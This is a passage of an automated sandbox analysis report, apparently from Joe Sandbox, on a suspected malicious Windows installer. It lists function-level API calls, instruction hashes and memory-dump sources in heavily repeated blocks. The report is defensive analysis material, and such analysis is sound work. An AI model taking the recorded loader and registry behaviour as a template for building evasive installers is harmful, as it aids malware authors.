                                                                                                                                                                                                  • Instruction ID: 9b609aa4dbda1b40da6c9694c56aee9f908f129f2491f8ac19b90d9f5f8e4f4b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4cad7792158b69fc064c933527736888f22fedd2346a68a48c9e5725d4d2403f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 19E0B6B4600209BFEB109FA4EE49F7B7AACEB04708F004565BD50F6191DBB8EC158A7C
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 004020FB
                                                                                                                                                                                                    • Part of subcall function 00405479: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsr10DA.tmp\System.dll,00000000,00424020,75D423A0,?,?,?,?,?,?,?,?,?,004033B0,00000000,?), ref: 004054B1
                                                                                                                                                                                                    • Part of subcall function 00405479: lstrlenW.KERNEL32(004033B0,Skipped: C:\Users\user\AppData\Local\Temp\nsr10DA.tmp\System.dll,00000000,00424020,75D423A0,?,?,?,?,?,?,?,?,?,004033B0,00000000), ref: 004054C1
                                                                                                                                                                                                    • Part of subcall function 00405479: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsr10DA.tmp\System.dll,004033B0), ref: 004054D4
                                                                                                                                                                                                    • Part of subcall function 00405479: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsr10DA.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsr10DA.tmp\System.dll), ref: 004054E6
                                                                                                                                                                                                    • Part of subcall function 00405479: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040550C
                                                                                                                                                                                                    • Part of subcall function 00405479: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405526
                                                                                                                                                                                                    • Part of subcall function 00405479: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405534
                                                                                                                                                                                                  • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 0040210C
                                                                                                                                                                                                  • FreeLibrary.KERNELBASE(?,?,?,?,?,00000008,00000001,000000F0), ref: 00402189
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 334405425-0
                                                                                                                                                                                                  • Opcode ID: d36c9fe9f5930fea64fbdd9db72136e738f9ce38e1766e8381d205f98b75c4d4
                                                                                                                                                                                                  • Instruction ID: ec066b6349dd7fa10fed5d852794e64c7c96c86c32cb5d354c2886168094fa20
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d36c9fe9f5930fea64fbdd9db72136e738f9ce38e1766e8381d205f98b75c4d4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A7219931500104EBCF10AFA5CE49A9E7A71AF44354F34413BF515B51E0CBBD9D829A1D
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GlobalFree.KERNEL32(0054DCF8), ref: 00401C0B
                                                                                                                                                                                                  • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C1D
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Global$AllocFree
                                                                                                                                                                                                  • String ID: Call
                                                                                                                                                                                                  • API String ID: 3394109436-1824292864
                                                                                                                                                                                                  • Opcode ID: b580abd421464de60e3152648e96fb304686466f6115e97d9da9e43d3cf48cf8
                                                                                                                                                                                                  • Instruction ID: bf14f8cf48d280ad10deff957409e7ec0fbe11b3568df8ef6b08dac15d949b91
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b580abd421464de60e3152648e96fb304686466f6115e97d9da9e43d3cf48cf8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5221A872600114DBD720AF94CE85E5A73B4BB04718725053BFA52F72D0D7BCAC508BAD
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025C9
                                                                                                                                                                                                  • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025DC
                                                                                                                                                                                                  • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsr10DA.tmp,00000000,00000011,00000002), ref: 004025F5
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Enum$CloseValue
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 397863658-0
                                                                                                                                                                                                  • Opcode ID: b45ad3f346f858c538de9cdf33c1f23bddf71820cfdb074167878625ca5642e8
                                                                                                                                                                                                  • Instruction ID: a8e4f27cd85b524b938bc80bb312ff0c07efa3365ef466736b2b8963d993c2c8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b45ad3f346f858c538de9cdf33c1f23bddf71820cfdb074167878625ca5642e8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 92017C71A11504BBEB149FA49E48AAFB77CEF40348F10403AF501B61C0D7B85E40866D
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 00402553
                                                                                                                                                                                                  • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsr10DA.tmp,00000000,00000011,00000002), ref: 004025F5
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseQueryValue
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3356406503-0
                                                                                                                                                                                                  • Opcode ID: 02efc1595074ff6125f61c71cdcea2f8bbfde7ee005d48ec494ec48cff44d675
                                                                                                                                                                                                  • Instruction ID: af493c066ab36ea8406690c3d62a07c4fb2ed7115def6bf4d18b774961f6c260
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 02efc1595074ff6125f61c71cdcea2f8bbfde7ee005d48ec494ec48cff44d675
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CD116A71910209EBCF14DFA4CA589AEB774FF04354B20843BE402B62C0D3B88A44DB5E
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                                                  • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                                                                                  • Opcode ID: c5196716ed2294a5b6683282f685902d4e4d655c798d26bf32279206d375a943
                                                                                                                                                                                                  • Instruction ID: f4b073df4371d13d5e47470e1508f1e4354d1df05d26164fcbedf483487d3525
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c5196716ed2294a5b6683282f685902d4e4d655c798d26bf32279206d375a943
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4D01F4316242209FE7094B389D05B6A3698E710319F14823FF855F65F1EA78DC029B4C
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                                                                                                                                                                                                  • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Window$EnableShow
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1136574915-0
                                                                                                                                                                                                  • Opcode ID: 3ebb4b6c0f57e11481d011874966e0d0d22a9f74758462fdaea170207406e6f9
                                                                                                                                                                                                  • Instruction ID: 5d2b838fc97348560faaf82546316e7c29db3ee13ca796b15ebd5141c346d58e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3ebb4b6c0f57e11481d011874966e0d0d22a9f74758462fdaea170207406e6f9
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6FE09A32A042009FD704EFA4AE484AEB3B4EB90325B20097FE401F20C1CBB85C008A2D
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • ShowWindow.USER32(00010422,?), ref: 00401587
                                                                                                                                                                                                  • ShowWindow.USER32(0001041C), ref: 0040159C
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ShowWindow
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1268545403-0
                                                                                                                                                                                                  • Opcode ID: d774f881f7c8e5750da5b0c39fb9d45a8a172f0d5736a58faf6126e3e86ff3cd
                                                                                                                                                                                                  • Instruction ID: fa776b8181dd7fe9ab65e8e076fc9876fffd29900cbf92d35bc205126ec889e9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d774f881f7c8e5750da5b0c39fb9d45a8a172f0d5736a58faf6126e3e86ff3cd
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 03E0BF76B20114ABCB14DFA8ED908AE77B6EB94315724453BE502B32D0C6B5AD408F68
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(?,00000020,?,00403537,?), ref: 00406818
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00406833
                                                                                                                                                                                                    • Part of subcall function 00406796: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004067AD
                                                                                                                                                                                                    • Part of subcall function 00406796: wsprintfW.USER32 ref: 004067E8
                                                                                                                                                                                                    • Part of subcall function 00406796: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004067FC
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2547128583-0
                                                                                                                                                                                                  • Opcode ID: 04b739db586b670126c7119b566f03dd1efc4ec82adb23a6bbf3e60323b3d7ce
                                                                                                                                                                                                  • Instruction ID: c5f632ab0fd527bf8e68b4786b10832766149758e6d8e51d9ba55f9b7eb13659
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 04b739db586b670126c7119b566f03dd1efc4ec82adb23a6bbf3e60323b3d7ce
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 30E0863350421056E211AA746E44C7B77A89F99750307843EF956F2080D738DC359679
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetFileAttributesW.KERNELBASE(?,00403055,C:\Users\user\Desktop\U6SJBLxT2Z.exe,80000000,?,?,?,00000009,?), ref: 00405F0B
                                                                                                                                                                                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000009,?), ref: 00405F2D
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$AttributesCreate
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 415043291-0
                                                                                                                                                                                                  • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                                                                                                                                                  • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CreateDirectoryW.KERNELBASE(?,00000000,004034B8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040370F,?,?,00000009,?), ref: 004059CB
                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00000009,?), ref: 004059D9
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1375471231-0
                                                                                                                                                                                                  • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                                                                                                                                                  • Instruction ID: 1e5fcd6d8aa83e7c3539c134ce858d200345c8ad9b438ef6e258ac5dd368824a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 27C04C71204541EEE6505B20AE09B177A909B50751F26843A6147F01A0DA388455E93D
                                                                                                                                                                                                  Uniqueness

